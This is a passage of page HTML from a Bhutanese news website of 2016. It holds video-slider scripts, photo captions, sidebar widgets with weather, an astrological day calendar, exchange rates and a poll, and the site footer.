		jQuery('.huge-it-iframe').each(function(){
			
			var el_id = jQuery(this).attr('data-element-id');
			var volume = HUGEIT_YT_IFRAMES['iframe'+el_id]['volume'];
			
			window['onPlayerReady'+el_id] = function(event) {
				window['player_'+el_id]['setVolume'](volume);
			}
		});		

		jQuery('.huge-it-iframe').each(function(){
		
			var id = jQuery(this).attr('id');
			var el_id = jQuery(this).attr('data-element-id');
			var controls = HUGEIT_YT_IFRAMES['iframe'+el_id]['controls'];
			var showinfo = HUGEIT_YT_IFRAMES['iframe'+el_id]['showinfo'];
			var url = HUGEIT_YT_IFRAMES['iframe'+el_id]['videoId'];
			controls||(controls = 0);
			showinfo||(showinfo = 0);
			
			window['player_'+el_id] = new YT.Player(id, {
				height: '350',
				width: '300',
				videoId: url,
				playerVars: {
					'controls': controls,
					'showinfo': showinfo,
					'rel':0
				},
				events: {
					'onError': window['onPlayerError'+el_id],
					'onReady': window['onPlayerReady'+el_id],
					'onStateChange': window['onPlayerStateChange'+el_id],
					'loop':1
				}
			});			
		})
	});
	
	jQuery(function(){

		jQuery('.huge-it-iframe').each(function(){
			
			var el_id = jQuery(this).attr('data-element-id');
			var quality = HUGEIT_YT_IFRAMES['iframe'+el_id]['quality'];	
		
			window['onPlayerStateChange'+el_id] = function(event) {
		
				if (event.data == YT.PlayerState.PLAYING) {
					HUGEIT_YT_IFRAMES['iframe'+el_id]['state']='played';
					event.target.setPlaybackQuality(quality);
				}
			}
		});
	
	});
	function stopYoutubeVideo(currentVideo,nextVideo) {

		if(currentVideo) {
			(HUGEIT_YT_IFRAMES['iframe'+currentVideo]['state'])?currentVideo&&(window['player_'+currentVideo]['pauseVideo']()):currentVideo&&(window['player_'+currentVideo]['stopVideo']());
		}
		nextVideo&&HUGEIT_YT_IFRAMES['iframe'+nextVideo]['autoplay']&&(window['player_'+nextVideo]['playVideo']());
	}	
	
	function stopVimeoVideo(currentVideo,nextVideo){
		jQuery(currentVideo).vimeo('pause');
		jQuery(nextVideo).vimeo('play');
	}
/*** <Vimeo> initialize And youtube autopay ***/ 

	jQuery( window ).load(function() {	

		(function VimeoOptionsReady(){ //calling funtion once
				jQuery('.huge-it-iframe-vimeo').each(function(){
					var el_id = jQuery(this).attr('data-element-id');
					jQuery(this).vimeo('setColor',HUGEIT_VIMEOS['iframe'+el_id]['color']);
					jQuery(this).vimeo('setVolume',HUGEIT_VIMEOS['iframe'+el_id]['volume']);
				})
		}());
		
		if('off' == 'on') {
							

			if(jQuery('.huge-it-iframe-vimeo.autoplay').length) {
								
				(function AutoplayVimeo() {
					var setplayVideo = setInterval(hugeitframe, 100);
					function hugeitframe() {
						var vimeo1 = jQuery('.huge_it_slider_2 li').first().find('.autoplay')
							if(vimeo1.length) {
								vimeo1.vimeo('play');
								clearInterval(setplayVideo);
							}
					}
				}());
			}
			
			if(jQuery('.huge-it-iframe.autoplay').length) {
									
				(function AutoplayYoutube() {
					var setplayVideo = setInterval(hugeitframe, 100);
					function hugeitframe() {
						jQuery('.huge-it-iframe.autoplay').each(function(){
							
						var el_id = jQuery(this).attr('data-element-id');
						
						if(window['player_'+el_id]) {
							window['player_'+el_id]['playVideo']();
							clearInterval(setplayVideo);
						}
						});	
					}
				}());
			}
		}
	});

/*** </Vimeo> initialize***/ 

</script>
<!--  </#######ADD YOUTUBE IFRAME TWICE END########>-->
		
	
<script>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</script>
<style>

.imgc_slider #slider77 {
	border-color: aqua;
    border-width: 3px;
	text-transform: uppercase;
	list-style: none;
	outline: none;
}

	.thumb_image{
		  position: absolute;
		  width: 100%;
		  height: 100%;
		  top: 0;
		  left:0;
	}
	.entry-content a{
		border-bottom: none !important;
	}
	.play-button-slider{
		top: 0;
    left: 0;
    width: 100%;
    height: 100%;
	}
	.youtube-icon { position: absolute;
    
    background:url(http://www.kuenselonline.com/wp-content/plugins/slider-image/images/play.youtube.png) center center no-repeat;background-size:14%;}
</style>
	
<div class="huge_it_slideshow_image_wrap_2 ">
			<div id="huge_it_loading_image_2" class="nodisplay"> <img src="http://www.kuenselonline.com/wp-content/plugins/slider-image/Front_images/loading/loading1.gif"  alt="" width="100" height="100" style=" margin: 0 auto;" /> </div>
		<div class="huge_it_slideshow_image_wrap1_2" class="display">
	            
		<!-- ##########################DOTS######################### -->
        <div class="huge_it_slideshow_dots_container_2">
			  <div class="huge_it_slideshow_dots_thumbnails_2">
				  							  <div id="huge_it_dots_0_2"
							       class="huge_it_slideshow_dots_2 huge_it_slideshow_dots_active_2"
							       onclick="if(jQuery(this).hasClass('huge_it_slideshow_dots_active_2')) { return false; } huge_it_change_image_2(parseInt(jQuery('#huge_it_current_image_key_2').val()), '0', data_2,false,true);return false;"
							       data-image_id="588"
							       data-image_key="0"></div>
							  							  <div id="huge_it_dots_1_2"
							       class="huge_it_slideshow_dots_2 huge_it_slideshow_dots_deactive_2"
							       onclick="if(jQuery(this).hasClass('huge_it_slideshow_dots_active_2')) { return false; } huge_it_change_image_2(parseInt(jQuery('#huge_it_current_image_key_2').val()), '1', data_2,false,true);return false;"
							       data-image_id="587"
							       data-image_key="1"></div>
							  			  </div>
			
							<a id="huge_it_slideshow_left_2" href="#">
					<div id="huge_it_slideshow_left-ico_2">
					<div><i class="huge_it_slideshow_prev_btn_2 fa"></i></div></div>
				</a>
				
				<a id="huge_it_slideshow_right_2" href="#">
					<div id="huge_it_slideshow_right-ico_2">
					<div><i class="huge_it_slideshow_next_btn_2 fa"></i></div></div>
				</a>
					</div>
	  <!-- ##########################IMAGES######################### -->

      <div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">        
        <div class="huge_it_slide_container_2">
          <div class="huge_it_slide_bg_2">
            <ul class="huge_it_slider_2">
			  					  <li class="huge_it_slideshow_image_item_2" id="image_id_2_0">      
						<a href="http://www.kuenselonline.com/picture-story-243/" target="_blank">                                                						<img id="huge_it_slideshow_image_2_0" class="huge_it_slideshow_image_2" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/je.jpg"  alt="" data-image_id="588" />
						</a>		
						<div class="huge_it_slideshow_title_text_2 none">
													</div>
						<div class="huge_it_slideshow_description_text_2 ">
							The annual Moenlam Chhenmo in Samtse, presided over by His Holiness the Je Khenpo ended yesterday with the administering of Tshewang (Long life empowerment). 						</div>
					  </li>
					  					  <li class="huge_it_slideshow_image_second_item_2" id="image_id_2_1">      
						<a href="http://www.kuenselonline.com/picture-story-242/" target="_blank">                                                						<img id="huge_it_slideshow_image_2_1" class="huge_it_slideshow_image_2" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/yaks.jpg"  alt="" data-image_id="587" />
						</a>		
						<div class="huge_it_slideshow_title_text_2 none">
													</div>
						<div class="huge_it_slideshow_description_text_2 ">
							The Animal Life Saving Association purchased 21 yaks destined for slaughter at a total cost of around Nu 662,000 on November 21 to coincide with Descending Day of Lord Buddha.						</div>
					  </li>
					              </ul>
          </div>
		  <input  type="hidden" id="huge_it_current_image_key_2" value="0" />
        </div>
      </div>
	</div>
<!-- slider thumbs  -->

<script>
	jQuery(document).ready(function(jQuery) {
		setInterval(function() {
			jQuery('.huge_it_slider_2').find("li").each(function() {

				if (jQuery(this).css("opacity") == "1") {

					var img_id = jQuery(this).attr('id');
					jQuery('.huge_it_slideshow_thumbs_2').each(function() {
						var allListElements = jQuery('li[id=' + img_id + ']');

						jQuery(this).find(allListElements).not(".bx-clone").each(function() {
							jQuery('.huge_it_slideshow_thumbs_2 li').find(".trans_back").css('background', 'rgba(255,255,255,0.3)');
							jQuery(this).find('.trans_back').css('background', 'none');
						})
					})
				}
			})
		}, 100)
	})
</script>

	

		</div>
	
				</div><div class="clear"></div></div></div><!-- .widget /--><div id="text-21" class="widget widget_text"><div class="widget-top"><h4> </h4><div class="stripe-line"></div></div>
						<div class="widget-container">			<div class="textwidget"><P><b>12th Five Year Plan Preparation</b><br><a href="https://www.facebook.com/GNHCPPD/" target="_blank">Facebook</a><br><a href="http://www.gnhc.gov.bt/12th-fyp-preparation/" target="_blank">Web</a></P>
<hr>
<P><a href="http://www.traveltobhutan.travel/bhutan-tours/" target="_blank"><img src="http://www.kuenselonline.com/wp-content/uploads/2016/08/yalholiday.jpg" alt="yak" class="ads" border="0" width="80" align="left" style="margin-right:5px;" ></a><a href="http://www.traveltobhutan.travel/" target="_blank">Travel to Bhutan</a> with Yak Holidays Int'l, we offer best deals on <a href="http://www.traveltobhutan.travel/bhutan-tours/" target="_blank">Bhutan Tours</a> and <a href="http://www.traveltobhutan.travel/trekking-in-bhutan/" target="_blank"> Trekking in Bhutan.</a>
</P>
<P><a href="http://www.eaz.bt/" target="_blank"><img src="http://www.kuenselonline.com/wp-content/uploads/eaz1.jpg" alt="Avail Scholarship to study in India" class="ads"></a></P>
<P><a href="http://flexsharp.com/" target="_blank"><img src="http://www.kuenselonline.com/wp-content/uploads/flex.jpg" alt="flexsharp" class="ads"></a></P>


</div>
		</div></div><!-- .widget /--><style>.rpwe-block ul{
list-style: none !important;
margin-left: 0 !important;
padding-left: 0 !important;
}

.rpwe-block li{
border-bottom: 1px solid #eee;
margin-bottom: 10px;
padding-bottom: 10px;
list-style-type: none;
}

.rpwe-block a{
display: inline !important;
text-decoration: none;
}

.rpwe-block h3{
background: none !important;
clear: none;
margin-bottom: 0 !important;
margin-top: 0 !important;
font-weight: 400;
font-size: 12px !important;
line-height: 1.5em;
}

.rpwe-thumb{
border: 1px solid #eee !important;
box-shadow: none !important;
margin: 2px 10px 2px 0;
padding: 3px !important;
}

.rpwe-summary{
font-size: 12px;
}

.rpwe-time{
color: #bbb;
font-size: 11px;
}

.rpwe-alignleft{
display: inline;
float: left;
}

.rpwe-alignright{
display: inline;
float: right;
}

.rpwe-aligncenter{
display: block;
margin-left: auto;
margin-right: auto;
}

.rpwe-clearfix:before,
.rpwe-clearfix:after{
content: "";
display: table !important;
}

.rpwe-clearfix:after{
clear: both;
}

.rpwe-clearfix{
zoom: 1;
}
</style><div id="rpwe_widget-3" class="widget rpwe_widget recent-posts-extended"><div class="widget-top"><h4>Feature</h4><div class="stripe-line"></div></div>
						<div class="widget-container"><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="http://www.kuenselonline.com/tshorwa-the-inner-call/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/movie-1-300x150.jpg" alt="Tshorwa – The Inner Call"></a><h3 class="rpwe-title"><a href="http://www.kuenselonline.com/tshorwa-the-inner-call/" title="Permalink to Tshorwa – The Inner Call" rel="bookmark">Tshorwa – The Inner Call</a></h3><div class="rpwe-summary">Review: Revolving around the existence or the non-existence of black magic &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="http://www.kuenselonline.com/khotsas-healing-hands/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/IMG_6535-300x150.jpg" alt="Khotsa’s healing hands"></a><h3 class="rpwe-title"><a href="http://www.kuenselonline.com/khotsas-healing-hands/" title="Permalink to Khotsa’s healing hands" rel="bookmark">Khotsa’s healing hands</a></h3><div class="rpwe-summary">Health: Like people in many rural places, villagers of Domphu in &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="http://www.kuenselonline.com/back-home-to-pick-buckthorn-berries-by-tang-chu/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/Farming-1-300x150.jpg" alt="Back home to pick buckthorn berries by Tang Chu"></a><h3 class="rpwe-title"><a href="http://www.kuenselonline.com/back-home-to-pick-buckthorn-berries-by-tang-chu/" title="Permalink to Back home to pick buckthorn berries by Tang Chu" rel="bookmark">Back home to pick buckthorn berries by Tang Chu</a></h3><div class="rpwe-summary">Two educated farmers from Tang return home from Austria buoyed &hellip;</div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div></div><!-- .widget /-->     
 

     <div class="advertisement">

		

	</div>



      <div class="advertisement">

		
	</div>
<style>.rpwe-block ul{
list-style: none !important;
margin-left: 0 !important;
padding-left: 0 !important;
}

.rpwe-block li{
border-bottom: 1px solid #eee;
margin-bottom: 10px;
padding-bottom: 10px;
list-style-type: none;
}

.rpwe-block a{
display: inline !important;
text-decoration: none;
}

.rpwe-block h3{
background: none !important;
clear: none;
margin-bottom: 0 !important;
margin-top: 0 !important;
font-weight: 600;
font-size: 18px !important;
line-height: 1.5em;
}
.rpwe-block li + li img {
width:80px;
height:60px;
border: 1px solid #eee !important;
box-shadow: none !important;
margin: 2px 10px 2px 0;
padding: 3px !important;

}
.rpwe-thumb{
border: 1px solid #eee !important;
box-shadow: none !important;
margin: 2px 10px 2px 0;
padding: 3px !important;
}

.rpwe-summary{
font-size: 12px;
}

.rpwe-time{
color: #bbb;
font-size: 11px;
}

.rpwe-alignleft{
display: inline;
float: left;
}

.rpwe-alignright{
display: inline;
float: right;
}

.rpwe-aligncenter{
display: block;
margin-left: auto;
margin-right: auto;
}

.rpwe-clearfix:before,
.rpwe-clearfix:after{
content: "";
display: table !important;
}

.rpwe-clearfix:after{
clear: both;
}

.rpwe-clearfix{
zoom: 1;
}
</style><div id="rpwe_widget-4" class="widget rpwe_widget recent-posts-extended"><div class="widget-top"><h4>K2</h4><div class="stripe-line"></div></div>
						<div class="widget-container"><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><h3 class="rpwe-title"><a href="http://www.kuenselonline.com/fablab-comes-to-bhutan/" title="Permalink to FabLab comes to Bhutan" rel="bookmark">FabLab comes to Bhutan</a></h3><time class="rpwe-time published" datetime="2016-11-20T12:02:00+00:00">November 20, 2016</time></li><li class="rpwe-li rpwe-clearfix"><h3 class="rpwe-title"><a href="http://www.kuenselonline.com/losing-fat-2/" title="Permalink to Losing fat" rel="bookmark">Losing fat</a></h3><time class="rpwe-time published" datetime="2016-11-20T12:01:59+00:00">November 20, 2016</time></li><li class="rpwe-li rpwe-clearfix"><h3 class="rpwe-title"><a href="http://www.kuenselonline.com/srungkue-the-blessed-protection-cord-2/" title="Permalink to Srungkue: The Blessed Protection Cord" rel="bookmark">Srungkue: The Blessed Protection Cord</a></h3><time class="rpwe-time published" datetime="2016-11-20T12:00:56+00:00">November 20, 2016</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div></div><!-- .widget /--><div class="otw-sc-tabs ui-tabs ui-widget ui-widget-content ui-corner-all"><ul class="ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all"><li class="ui-state-default ui-corner-top"><a href="#tabs-1"><i class="general foundicon-cloud"> </i>Weather</a></li><li class="ui-state-default ui-corner-top"><a href="#tabs-2"><i class="general foundicon-star"> </i>Zakar</a></li><li class="ui-state-default ui-corner-top"><a href="#tabs-3"><i class="general foundicon-graph"> </i>FX Rate</a></li></ul><div id="tabs-1" class="ui-tabs-panel ui-widget-content ui-corner-bottom"><p><table><tr><td colspan="4"><b> November 08, 2016 </script></b></td></tr><p><tr><th><p align="left"> Type </p></th><th><p align="left"> Region </p></th><th><p align="left"> Max </p></th><th><p align="left"> Min </p></th></tr><tr bgcolor="#eff6fb"><td> <a href="" class="weathericon" data-icon="B"></a> </td><td>Thimphu </td><td>21</td><td> 1 </td></tr><tr><td><a href="" class="weathericon" data-icon="B"></a> </td><td>Gasa </td><td> 13 </td><td> 1 </td></tr><tr bgcolor="#eff6fb"><td> <a href="" class="weathericon" data-icon="B"></a> </td><td>Trongsa </td><td> 23 </td><td>3 </td></tr><tr><td> <a href="" class="weathericon" data-icon="B"></a> </td><td>Bumthang </td><td> 18 </td><td> -2 </td></tr><tr bgcolor="#eff6fb"><td> <a href="" class="weathericon" data-icon="B"></a> </td><td>Trashigang </td>	<td> 24 </td><td> 7</td></tr><tr><td> <a href="" class="weathericon" data-icon="B"></a> </td><td>Sarpang </td><td> 29</td><td> 19 </td></tr><tr bgcolor="#eff6fb"><td> <a href="" class="weathericon" data-icon="B"></a> </td><td>Phuentsholing </td><td> 31 </td><td> 21 </td></tr><tr><td colspan="3">	<font size="2"><i> Source: Meteorology Division, DHMS, MOEA, For any weather information : call hotline 339673</i></font></td></tr></table> </p></div><div id="tabs-2" class="ui-tabs-panel ui-widget-content ui-corner-bottom"><p><b>November 08, Tuesday</b><br />
<b>Good day</b>  <br />
- to perform lhabsang and thruesel<br />
- to perform lhasung<br />
- to learn astrology<br />
- to appoint to new post<br />
- to hand and take over office<br />
- to marry<br />
- to celebrate<br />
- to shift house<br />
- to enter in a new house<br />
- to start new business<br />
- to sow seeds<br />
- to plant trees and flowers<br />
<br />
<b>Bad day</b> <br />
- to roof house<br />
<br />
A good day for rituals (laza) for those born in the rat and pig years. <br />
Generally a good day (sogza) for those born in the ox, dragon and dog years. <br />
A bad day (shedza) for those born in the snake and horse years.<br />
<br />
*********************************<br />
<b>November 09, Wednesday</b><br />
<b>Good day</b><br />
- to perform daily rituals <br />
<br />
<b>Bad day</b>  <br />
- to appoint to new post<br />
- to learn astrology<br />
- to hand and take over office<br />
- to shift house<br />
- to enter in a new house<br />
- to start new business<br />
- to hoist lungdar<br />
- to roof house<br />
<br />
A good day for rituals (laza) for those born in the tiger and rabbit years. <br />
Generally a good day (sogza) for those born in the monkey and rooster years. <br />
A bad day (shedza) for those born in the ox and dragon years.</p></div><div id="tabs-3" class="ui-tabs-panel ui-widget-content ui-corner-bottom"><p><table><tr><td colspan="3"> Nu per units of foreign Currency </td></tr><tr><th><p align="left"> Notes </p></th><th> <p align="left">Buy </p></th><th><p align="left"> Sell <p></th></tr><tr bgcolor="#eff6fb"><td> US $ </td><td> 65.70 </td><td> 67.85 </td></tr><tr><td> Pound </td><td> 81.45 </td><td> 83.70 </td></tr><tr bgcolor="#eff6fb"><td> Euro </td><td> 72.60 </td><td> 74.60 </td></tr><tr><td> YEN (100) </td><td>62.80 </td><td> 64.55 </td></tr><tr bgcolor="#eff6fb"><td> HK $ </td><td> 8.45 </td><td> 8.70 </td></tr><tr><td> AUS $ </td><td> 50.45 </td><td> 51.85 <td></tr><tr bgcolor="#eff6fb"><td> Sing $ </td><td> 47.25</td><td> 48.60</td></tr><tr><td colspan="3"><i> <p align="right"><font size="2">Courtesy BoB. </font></p></i></td></tr></table> </p></div></div><div id="polls-widget-3" class="widget widget_polls-widget"><div class="widget-top"><h4>Polls</h4><div class="stripe-line"></div></div>
						<div class="widget-container"><div id="polls-21" class="wp-polls">
	<form id="polls_form_21" class="wp-polls-form" action="/index.php" method="post">
		<p style="display: none;"><input type="hidden" id="poll_21_nonce" name="wp-polls-nonce" value="0760d2734f" /></p>
		<p style="display: none;"><input type="hidden" name="poll_id" value="21" /></p>
		<p style="text-align: center;"><strong>Do you support the reintroduction of the lottery business?</strong></p><div id="polls-21-ans" class="wp-polls-ans"><ul class="wp-polls-ul">
		<li><input type="radio" id="poll-answer-69" name="poll_21" value="69" /> <label for="poll-answer-69">Yes</label></li>
		<li><input type="radio" id="poll-answer-70" name="poll_21" value="70" /> <label for="poll-answer-70">No</label></li>
		<li><input type="radio" id="poll-answer-71" name="poll_21" value="71" /> <label for="poll-answer-71">Don't care</label></li>
		</ul><p style="text-align: center;"><input type="button" name="vote" value="   Vote   " class="Buttons" onclick="poll_vote(21);" style="width: 100%;" /></p><p style="text-align: center;" class="vwrslt"><a href="#ViewPollResults" onclick="poll_result(21); return false;" title="View Results Of This Poll">View Results</a></p></div>
	</form>
</div>
<div id="polls-21-loading" class="wp-polls-loading"><img src="http://www.kuenselonline.com/wp-content/plugins/wp-polls/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="wp-polls-image" />&nbsp;Loading ...</div>
<ul><li class="arch"><a href="http://www.kuenselonline.com/2015dev3/pollsarchive">Polls Archive</a></li></ul></div></div><!-- .widget /-->


	</div><!-- .theiaStickySidebar /-->
</aside><!-- #sidebar /-->	<div class="clear"></div>
</div><!-- .container /-->

<footer id="theme-footer">
	<div id="footer-widget-area" class="footer-3c">

			<div id="footer-first" class="footer-widgets-box">
			<div id="text-12" class="footer-widget widget_text"><div class="footer-widget-top"><h4>Quick links</h4></div>
						<div class="footer-widget-container">			<div class="textwidget"><ul>
<li><a href="http://www.kuenselonline.com/2015dev3/kuensel/">About Us</a></li>
<li><a href="http://www.bhutan.gov.bt/">Bhutan</a></li>
<li><a href="/rss/">Rss</a></li>
<li><A HREF=-"http://www.kuenselonline.com/archive">Kuensel Archive</a></li>
</ul>
</div>
		</div></div><!-- .widget /-->		</div>
	
			<div id="footer-second" class="footer-widgets-box">
			<div id="text-19" class="footer-widget widget_text"><div class="footer-widget-top"><h4>Social Links</h4></div>
						<div class="footer-widget-container">			<div class="textwidget"><ul>
<li><a href="https://www.facebook.com/Kuensel">Facebook</a></li>
<li><a href="http://twitter.com/kuenselonline">Twitter</a>
</ul></div>
		</div></div><!-- .widget /-->		</div><!-- #second .widget-area -->
	

			<div id="footer-third" class="footer-widgets-box">
			<div id="text-14" class="footer-widget widget_text"><div class="footer-widget-top"><h4>Contact us</h4></div>
						<div class="footer-widget-container">			<div class="textwidget"><P>Kuensel Corporation Ltd. <br/>
PO BOX 204 <br/>
Tel: 975-2-322483/324688 <br/>
Fax: 975-2-322975<BR>
<A HREF="http://www.kuenselonline.com/contact/">Contact us <FONT COLOR="#0099cc">online</font></A>
</P>
<BR>
<A HREF="http://www.asianewsnet.net/"><IMG SRC="http://www.kuenselonline.com/wp-content/uploads/ann_logo_clr_small.png" WIDTH="100" HEIGHT="41"></A>
</div>
		</div></div><!-- .widget /-->		</div><!-- #third .widget-area -->
	
		
	</div><!-- #footer-widget-area -->
	<div class="clear"></div>
</footer><!-- .Footer /-->
				
<div class="clear"></div>
<div class="footer-bottom">
	<div class="container">
		<div class="alignright">
			© Copyright 2016, Kuensel Corporation Ltd. 

		</div>
				<div class="social-icons">
		<a class="ttip-none" title="Rss" href="http://www.kuenselonline.com/feed/" target="_blank"><i class="fa fa-rss"></i></a>		
			</div>

		
		<div class="alignleft">
			<FONT COLOR="#999999">Design: Kuensel. Development & global hosting: <a href="http://webexa.com" target="_blank" /> <B>WEBEXA</B></a></font>		</div>
		<div class="clear"></div>
	</div><!-- .Container -->
</div><!-- .Footer bottom -->

</div><!-- .inner-Wrapper -->
</div><!-- #Wrapper -->
</div><!-- .Wrapper-outer -->
	<div id="topcontrol" class="fa fa-angle-up" title="Scroll To Top"></div>
<div id="fb-root"></div>

	<style>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</style>


	<link rel='stylesheet' id='style-name-css'  href='http://www.kuenselonline.com/wp-content/plugins/lightbox/css/frontend/colorbox-1.css' type='text/css' media='all' />
<link rel='stylesheet' id='bxSlidercss-css'  href='http://www.kuenselonline.com/wp-content/plugins/slider-image/style/jquery.bxslider.css' type='text/css' media='all' />
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"loaderUrl":"http:\/\/www.kuenselonline.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"sending":"Sending ..."};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sb_core_ajax = {"url":"http:\/\/www.kuenselonline.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/sb-core/js/sb-core-script.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/sb-tab-widget/js/sb-tab-widget-script.min.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"http:\/\/www.kuenselonline.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/wp-polls/polls-js.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var tie = {"mobile_menu_active":"true","mobile_menu_top":"","lightbox_all":"true","lightbox_gallery":"true","lightbox_skin":"dark","lightbox_thumb":"vertical","lightbox_arrows":"","sticky_sidebar":"","lang_no_results":"No Results","lang_results_found":"Results Found"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/themes/sahifa/js/tie-scripts.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/themes/sahifa/js/ilightbox.packed.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/themes/sahifa/js/validation.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-includes/js/comment-reply.min.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-includes/js/wp-embed.min.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/lightbox/js/frontend/custom.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/lightbox/js/frontend/jquery.colorbox.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var hugeit_slider_obj = {"slideCount":"3","pauseTime":"10000","width_thumbs":"100","speed":"3000"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/slider-image/js/jquery.bxslider.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/slider-image/js/bxslider.setup.js'></script>
    <!--<script type="text/javascript" src="http://www.kuenselonline.com/wp-content/themes/sahifa/js/jquery-1.11.2.min.js"></script>
    <script type="text/javascript" src="http://www.kuenselonline.com/wp-content/themes/sahifa/js/jquery-migrate-1.2.1.min.js"></script>
    <script type="text/javascript" src="http://www.kuenselonline.com/wp-content/themes/sahifa/js/jquery-ui.js"></script>-->


</body>
</html>